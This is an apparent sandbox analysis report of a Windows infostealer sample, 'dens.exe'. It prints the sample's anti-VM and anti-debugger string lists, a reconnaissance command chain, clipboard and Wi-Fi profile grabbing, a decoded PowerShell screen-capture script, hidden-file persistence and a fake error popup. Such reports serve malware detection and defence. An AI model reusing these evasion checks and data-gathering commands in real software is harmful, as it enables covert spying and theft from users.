            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: svchost.exe, 00000034.00000002.2910895034.000001DE8AE2F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwaretray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: elif b"vmware" in stdout2.lower():
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "qemu-ga.exe"P
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwareuser.exe0
            Source: svchost.exe, 00000034.00000002.2912409227.000001DE8C45C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe", # VirtualBox
            Source: ROUTE.EXE, 00000047.00000002.1849023843.0000029FC3A07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
            Source: dens.exe, 00000001.00000003.2054326320.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040249734.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066912837.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036645214.000002D9ACD2A000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Y_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: mKVMwarev
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b"vmware"
            Source: net1.exe, 0000003D.00000002.1822300778.0000026B06DB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Administrators
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmware
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe", # VMware
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ME: Hyper-V Guest Shutdo|
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxtray.exep
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 7Ovmware
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "vboxtray.exe", # VirtualBox
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe" e
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _NAME: Hyper-V PowerShelJ
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \sdvmsrvc.exep
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwaretray.e
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
            Source: dens.exe, 00000001.00000003.2029767074.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066795317.000002D9ACB50000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066553783.000002D9ACA40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: b'VMware'
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: mKVMware
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmsrvc.exe"`
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"
            Source: dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _NAME: vmicshutdown
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwaretray.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmusrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"p
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmtoolsd.exe
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service InterfacevmicguestinterfaceVirtual DiskvdsCredential ManagerVaultSvcVolumetric Audio Compositor ServiceVacSvcUpdate Orchestrator ServiceUA
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmware"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 3Udvmtoolsd.exeses0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 'qemu'
            Source: dens.exe, 00000001.00000003.2036402580.000002D9ACC47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe",Y
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vboxservice.exe"p
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dqemu-ga.exep
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxservice.exe
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicheartbeat
            Source: dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicvss
            Source: dens.exe, 00000001.00000003.2034812709.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040344730.000002D9AC52F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: \sdvmsrvc.exe
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 7Ofvmware
            Source: HOSTNAME.EXE, 00000035.00000002.1805171561.00000166DF5B9000.00000004.00000020.00020000.00000000.sdmp, NETSTAT.EXE, 00000049.00000002.1850291858.000001E18BE47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: ARP.EXE, 00000048.00000002.1849729767.0000021548F87000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGG
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmtoolsd.exe"@
            Source: sc.exe, 0000004A.00000002.1851582241.000001DE20E9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SERVICE_NAME: vmicshutdown
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hostNames = ['sandbox','cuckoo', 'vm', 'virtual', 'qemu', 'vbox', 'xen']
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray.exe0
            Source: dens.exe, 00000001.00000003.2029829320.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052097478.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2060887548.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047760361.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2040630139.000002D9AB28F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NAME: Hyper-V Remote De
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"0
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fqemu
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"
            Source: dens.exe, 00000001.00000002.2067199500.000002D9ADB10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "qemu-ga.exe"
            Source: dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmacthlp.exe", # VMware
            Source: dens.exe, 00000001.00000003.1954169257.000002D9AC3C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if b'VMware' in stdout:
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C10A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C10A614
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C113480 GetProcessHeap,0_2_00007FF62C113480
            Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\NETSTAT.EXEProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF62C0FC8A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62C0FD12C
            Source: C:\Users\user\Desktop\dens.exeCode function: 0_2_00007FF62C0FD30C SetUnhandledExceptionFilter,0_2_00007FF62C0FD30C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C10A614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF62C10A614
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF62C0FC8A0
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF62C0FD12C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FF62C0FD30C SetUnhandledExceptionFilter,1_2_00007FF62C0FD30C
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA53028 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAA53028
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFAA52A70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFAA52A70
            Source: C:\Users\user\Desktop\dens.exeCode function: 1_2_00007FFDFACA2BE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFACA2BE0

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
            Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Users\user\Desktop\dens.exe "C:\Users\user\Desktop\dens.exe"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
            Source: C:\Users\user\Desktop\dens.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\dens.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
